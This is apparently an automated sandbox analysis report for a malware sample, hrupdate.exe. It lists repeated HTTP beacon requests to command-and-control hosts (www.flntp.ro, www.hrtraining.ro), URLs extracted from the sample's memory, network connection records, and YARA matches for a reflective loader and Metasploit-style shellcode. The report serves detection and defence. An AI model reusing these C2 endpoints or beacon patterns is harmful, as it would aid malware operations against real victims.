      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /trakingu/user HTTP/1.0Host: www.hrtraining.ro
      Source: global trafficHTTP traffic detected: GET /trainingcheck_v5498 HTTP/1.0Host: www.hrtraining.ro
      Source: global trafficDNS traffic detected: DNS query: www.hrtraining.ro
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Thu, 19 Dec 2024 21:40:04 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
      Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498
      Source: hrupdate.exe, 00000000.00000002.2943524353.0000000004C6C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498b
      Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498dummyhttp://www.hrtraining.ro/trakingu/invalid
      Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trakingu/
      Source: hrupdate.exe, 00000000.00000002.2942801537.00000000010FB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trakingu/user
      Source: hrupdate.exe, 00000000.00000002.2942801537.00000000010FB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trakingu/useruser
      Source: hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/
      Source: hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/:D2
      Source: hrupdate.exe, 00000000.00000002.2942922670.0000000001289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/R
      Source: hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html
      Source: hrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html&X2
      Source: hrupdate.exe, 00000000.00000003.2672690716.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html03
      Source: hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html:D2
      Source: hrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html=
      Source: hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html=E3&
      Source: hrupdate.exe, 00000000.00000002.2942922670.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlA
      Source: hrupdate.exe, 00000000.00000002.2942922670.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlP
      Source: hrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmla
      Source: hrupdate.exe, 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlg
      Source: hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmloD
      Source: hrupdate.exe, 00000000.00000003.2166521732.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlp2
      Source: hrupdate.exe, 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlw
      Source: hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/ss/portallogin-gettask.html
      Source: hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/training.ro/rss/portallogin-gettask.htmlQG
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
      Source: unknownHTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.4:49732 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: dump.pcap, type: PCAPMatched rule: Rule for beacon reflective loader Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
